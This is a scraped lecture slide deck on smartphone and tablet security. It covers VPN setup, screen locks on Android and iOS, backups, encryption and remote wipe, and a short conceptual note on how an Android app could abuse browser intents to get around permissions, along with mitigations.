S Roy 1 Acknowledgement In preparing the presentation slides and the demo I received help from Professor Simon Ou Professor Gurdip Singh Professor Eugene Vasserman Fengguo Wei 2 ID: 732491
Download Presentation The PPT/PDF document "Smart Phones and Tablets: Security Issue..." is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
Slide1
Smart Phones and Tablets: Security Issues
S. Roy
1Slide2
Acknowledgement
In preparing the presentation slides and the demo, I received help from
Professor Simon
Ou
Professor Gurdip SinghProfessor Eugene VassermanFengguo Wei
2Slide3
What is a Smart Phone?
Smart Phone = Phone + Computer + Sensors
Provides various services
phone call, SMS,
computation, storage, accessing the Internet, data download, GPS, camera, and so on …OS:
Android
,
iOS, Windows Mobile, BlackBerryOS Make: Google, Apple, Microsoft, BlackBerryDevice Make: Samsung, Apple, HTC, BlackBerryPopular models: Galaxy S III, iPhone 5Connection/Service Providers: Att, Verizon, T-mobileConnection types: 3G, 4G, Wi-Fi, Bluetooth
3Slide4
What is a Tablet?
Tablet is a specialized mobile computer with a big screen
primarily
operated by touching the screen
used for reading books, watching videos, accessing the Internet, and so on wireless connections: 3G, 4G, Wi-Fi, BluetoothOS: Android,
iOS
p
opular models: Samsung Galaxy Tab, Apple iPad 4Slide5
Why to Secure Smart Phones/Tablets?
T
hese devices can do most of what a
computer
(e.g. a laptop) does.
Smartphones have extra features, such as
GPS, phone calls, SMS
.
Smartphones/tablets
probably
contain lot of
personal
information
.
There is some chance that we can
lose these devices.Recent study shows these devices are a growing target for malware.
Smartphones and tablets need to meet the same security standards as any computer
. The security issues of a smart phone are similar to those of a tablet. So, without loss of generality, we will focus only on smart phone security in this class.
5Slide6
Risks a Smart Phone Faces
Include risks of
insecure Wi-Fi
if this device uses an open Wi-Fi
Include risks of insecure Web browsing if done from this device
Include
a
dditional risks: Physical vulnerability (e.g. attacker physically capturing the phone and performing comprehensive scan)Sensitive information (GPS location, photo, contact list, etc.) leakage 6Slide7
Installing a VPN Client
To avoid the risk of using a smartphone in a public Wi-Fi, you may install a VPN client
As an example, visit KSU ITS website to get
the
instructions for installationAndroid : https://www.ksu.edu/its/security/vpn/androidinstall.html
iOS
:
https://www.ksu.edu/its/security/vpn/iosinstall.htmlFinally, you can use your KSU eID as the username and KSU password as the password to connect to the KSU VPN server.7Slide8
Installing the VPN App on Android: Step 1
8Slide9
Installing the VPN App on Android: Step 2
9Slide10
How to Start the KSU VPN Client?
10Slide11
Connected to the KSU VPN Server
11Slide12
Accessing the IEEE
Xplore Library from any Physical Location
12Slide13
Now let’s do the Hands-On
Activity
Search the Cisco VPN client
app
at the App store, and download it on your phoneInstall it and make the proper setting so that it can connect to the KSU VPN serverStart / Run the VPN client; then securely browse web sites (e.g. yahoo email)Take screenshots of your activitiesConnect your phone to your computer to transfer the screenshots
Use a “paint/photo” edit software to erase any private information present on the screenshots
You may need to submit the screenshots while doing the homework
13Slide14
M
inimize the Phone Data Loss Risk: Using a PIN or Password
A
user should lock the phone screen with a numeric PIN or a password. How long/complex should this PIN be to thwart cracking in a reasonable amount of time?
S
et
a timeout (after this interval the phone gets locked and the user needs to enter PIN)Before doing the PIN setup, ensure that your Android device has the latest updates. 14Slide15
Setting Lock in an Android Device: Step 1
N
avigate
to your devices
settings, and select Security, then select Set up screen lock
.
Acknowledgement:
http://xbase.ucdavis.edu/itexpress 15Slide16
Setting Lock in an Android Device: Step 2
Choose one option among the available ones: a
Pattern
, PIN, or Password.
16Slide17
Setting Lock in an Android Device: Step 3
Depending on which option you chose, you will see one of the following three screens:
17Slide18
Setting Lock in an Android Device: Step 4
Return to the
Security
settings
and set the lockout time. This feature locks your phone after it has been inactive for the length of time you choose.
18Slide19
Setting Lock in an
iOS Device: Step 1
To set a passcode navigate
through the following:
Settings > General > Passcode Lock > Turn Passcode On.
Acknowledgement:
http://xbase.
ucdavis.edu/itexpress
19Slide20
Setting Lock in an
iOS Device: Step 2
E
nter
a four digit passcode twice and then return to the Passcode Lock settings page.
Acknowledgement:
http://xbase.
ucdavis.edu/itexpress 20Slide21
Setting Lock in an
iOS Device: Step 3
You can create
a more
complex passcode with spaces and alphanumeric characters, not just numbers. Y
ou
can also change the
Require Passcode timing. This feature locks your phone after it has been inactive for the length of time you chooseAt this location you can also enable the Erase Data feature, which will wipe your personal information from your phone after 10 failed passcode attempts.Acknowledgement: http://xbase.ucdavis.edu/itexpress
21Slide22
Unlocking an
iOS Device
Y
our
passcode should unlock your iOS device once the screen has been turned off for the specified Require Passcode timing.
Acknowledgement:
http://xbase.
ucdavis.edu/itexpress 22Slide23
Further Improvement on Security
Back up
data
on the
device to be sure the data can be recovered Turn off
unused
services if any
such as Wi-Fi, Bluetooth or VPN. unused services could expose your device to unwelcome remote connections.turning off unused services can also prolong the device’s battery lifeLabel the device with minimal contact information such as an email address or office phone number. If you lose the device, report the loss to police. 23Slide24
Encryption and Remote Wipe Options
A
n
iPhone
(and an android phone) can encrypt all the data stored using the user’s passcode. by using the feature available on your smartphone or consider using a reputable data encryption app.You may protect yourself for when
you lose a mobile
device
by using the “remote wipe” feature, which can work via a Microsoft Exchange serverbut the benefit of “remote wipe” feature is debatable24Slide25
How an App can Exploit the Security Model
An example with Android:
t
he user installs a third-party app P from the
Android marketP does not demand (to require) “Internet” permissions during the installation time, so the user does not suspect P
later P sends a request (called
Intent
) to the standard “browser” app to open an Internet connection on behalf of Pthus P exploits the permission model and can harm the user (e.g. by leaking the user’s sensitive information to outside). Mitigation:Android market or you should have a tool for rigorous vetting of an app before the user install/use itUser should think twice before granting critical permissions during the app installationWe should always upgrade the apps and the system25Slide26
Comparing the Security Model of
Android and iPhone (iOS)
Android allows anybody to develop an app and make it available in the market with minimal vetting process;
On the other hand, Apple claims to rigorously vet a third-party app before it goes into the App Store.
The user grants permissions to an Android app during the installation time (all or none permission policy
) and there is no run-time monitoring
iOS
may ask the user for permission in run-time (and an app can run with partial permission set).26Slide27
Managing the Phone Settings
In the default setting, numerous apps open themselves in an automated fashion on a smart
phone. The user needs to be informed.
As an example, on an Android phone all Google apps (Gmail, Google Plus, etc.) are always ON by default.
The user needs to modify the settings to securely manage the apps: email apps, social network apps, messaging
apps, etc.
27Slide28
Summary
We discussed common security issues of smart phones/tablets.
We presented a few standard countermeasures to mitigate the risks
Remainder
:the next homework is due before the next class (1pm on March 7)
t
he next class will be held in
Room 12828